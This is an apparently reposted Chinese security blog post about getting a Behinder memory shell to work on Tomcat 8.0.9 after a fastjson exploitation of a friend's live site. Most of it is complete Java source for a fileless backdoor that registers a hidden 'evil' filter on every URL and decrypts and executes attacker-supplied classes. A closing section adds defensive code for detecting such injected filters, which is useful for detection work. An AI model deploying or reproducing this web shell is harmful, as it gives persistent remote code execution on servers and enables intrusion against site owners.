Running a Behinder (冰蝎) memory shell on Tomcat 8.0.9

Posted by admin on 2022-05-17 19:35:45

Here is how it went: a friend sent me a site that had a fastjson vulnerability. I planned to simply inject a memory shell and hand it back to him, but it turned out Tomcat 8.0.9 has a quirk.



(1) The memory shell would not inject

A quick probe showed that commands could be executed directly with JNDIExploit-1.3-SNAPSHOT.jar, so I moved on to injecting the memory shell.


(2) After injecting the memory shell directly, Behinder could not connect. I set up the same environment locally to find where the problem was.


WebappClassLoaderBase was flagged in red. Isn't that Tomcat's base class loader? That seemed odd, and it turned out Tomcat 8.0.9 simply does not have that class. So I changed approach:

1. Search for a generic way to obtain StandardContext

2. Debug locally and see whether it can be obtained another way

(3) I went with the second option. First I looked at the base web class loader in Tomcat 8.0.9: it is enough to define a servlet that fetches its own classloader and inspect it. I will skip the details of the process and go straight to the result.


Differences

  1. The base loader is WebappClassLoader

  2. The filterConfigs field is read directly from StandardContext

(4) Modify the memory shell slightly

(5) Local test: the shell came online successfully


The code is as follows:

// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.DispatcherType;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoader;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import sun.misc.BASE64Decoder;

public class be extends AbstractTranslet implements Filter {
    public be() {
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        try {
            System.out.println("Do Filter ......");
            HttpServletRequest request = (HttpServletRequest) servletRequest;
            HttpServletResponse response = (HttpServletResponse) servletResponse;
            HttpSession session = request.getSession();
            HashMap pageContext = new HashMap();
            pageContext.put("request", request);
            pageContext.put("response", response);
            pageContext.put("session", session);
            // The header name and value are redacted in the original post
            if (request.getMethod().equals("POST") && request.getHeader("*****").equals("****")) {
                String k = "dacfb08ed58189ca";
                session.putValue("u", k);
                Cipher c = Cipher.getInstance("AES");
                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
                Method method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
                method.setAccessible(true);
                byte[] evilclass_byte = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));
                Class evilclass = (Class) method.invoke(this.getClass().getClassLoader(), evilclass_byte, 0, evilclass_byte.length);
                evilclass.newInstance().equals(pageContext);
            }
        } catch (Exception var13) {
            var13.printStackTrace();
        }

        filterChain.doFilter(servletRequest, servletResponse);
        System.out.println("doFilter");
    }

    public void destroy() {
    }

    public static void main(String[] args) {
    }

    static {
        try {
            String name = "evil";
            String URLPattern = "/*";
            // Tomcat 8.0.9: the context class loader is WebappClassLoader (WebappClassLoaderBase does not exist there)
            WebappClassLoader webappClassLoaderBase = (WebappClassLoader) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
            Class aClass = null;

            try {
                aClass = standardContext.getClass();
                // aClass = standardContext.getClass().getSuperclass();
                aClass.getDeclaredField("filterConfigs");
            } catch (Exception var12) {
                aClass = standardContext.getClass();
                aClass.getDeclaredField("filterConfigs");
            }

            // On 8.0.9 filterConfigs lives directly on StandardContext
            Field Configs = aClass.getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map) Configs.get(standardContext);
            be behinderFilter = new be();
            FilterDef filterDef = new FilterDef();
            filterDef.setFilter(behinderFilter);
            filterDef.setFilterName("evil");
            filterDef.setFilterClass(behinderFilter.getClass().getName());
            standardContext.addFilterDef(filterDef);
            FilterMap filterMap = new FilterMap();
            filterMap.addURLPattern("/*");
            filterMap.setFilterName("evil");
            filterMap.setDispatcher(DispatcherType.REQUEST.name());
            standardContext.addFilterMapBefore(filterMap);
            Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
            constructor.setAccessible(true);
            ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
            filterConfigs.put("evil", filterConfig);
        } catch (NoSuchFieldException var13) {
            var13.printStackTrace();
        } catch (InvocationTargetException var14) {
            var14.printStackTrace();
        } catch (IllegalAccessException var15) {
            var15.printStackTrace();
        } catch (NoSuchMethodException var16) {
            var16.printStackTrace();
        } catch (InstantiationException var17) {
            var17.printStackTrace();
        }
    }
}
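As an added defender-side counterpart that is not part of the original post: the same StandardContext filter registry the shell writes into can be audited from inside a running context to spot filters that were registered at runtime rather than declared in web.xml. FilterAudit is a hypothetical helper name; it assumes a Tomcat 8.0.x classpath and uses only public Tomcat APIs (findFilterDefs, findFilterMaps, Loader.getClassLoader), so no reflection on filterConfigs is needed.

```java
import java.util.ArrayList;
import java.util.List;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

// Hypothetical helper for memory-shell hunting; not part of Tomcat or the original post.
public class FilterAudit {

    /** Returns one finding per filter definition that looks injected at runtime. */
    public static List<String> scan(StandardContext ctx) {
        List<String> findings = new ArrayList<>();
        ClassLoader webappLoader = ctx.getLoader().getClassLoader();
        for (FilterDef def : ctx.findFilterDefs()) {
            StringBuilder why = new StringBuilder();
            // Filters from web.xml carry only a class name; a pre-built instance means programmatic registration
            if (def.getFilter() != null) {
                why.append("registered with a live instance; ");
            }
            String className = def.getFilterClass();
            if (className != null) {
                try {
                    Class<?> c = Class.forName(className, false, webappLoader);
                    // Classes defined straight from a byte[] have no CodeSource: nothing backs them on disk
                    if (c.getProtectionDomain().getCodeSource() == null) {
                        why.append("class has no CodeSource (defined from bytes); ");
                    }
                } catch (ClassNotFoundException e) {
                    // Loaded by some other loader (e.g. a translet loader), invisible to the webapp
                    why.append("class not resolvable by the webapp loader; ");
                }
            }
            if (why.length() > 0) {
                findings.add(def.getFilterName() + " [" + patternsFor(ctx, def.getFilterName()) + "]: " + why);
            }
        }
        return findings;
    }

    /** Collects the URL patterns mapped to a filter name, so "/*" catch-alls stand out. */
    private static String patternsFor(StandardContext ctx, String filterName) {
        StringBuilder sb = new StringBuilder();
        for (FilterMap map : ctx.findFilterMaps()) {
            if (filterName.equals(map.getFilterName())) {
                sb.append(String.join(",", map.getURLPatterns())).append(' ');
            }
        }
        return sb.toString().trim();
    }
}
```

Run it from a trusted servlet or JMX hook and compare the findings against the filters actually declared in the application's web.xml; the "evil" filter above would be reported on both heuristics.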


Originally published on the WeChat public account e0m安全屋: 关于tomcat8.0.9打冰蝎

Reposted on CN-SEC: https://cn-sec.com/archives/1014634.html
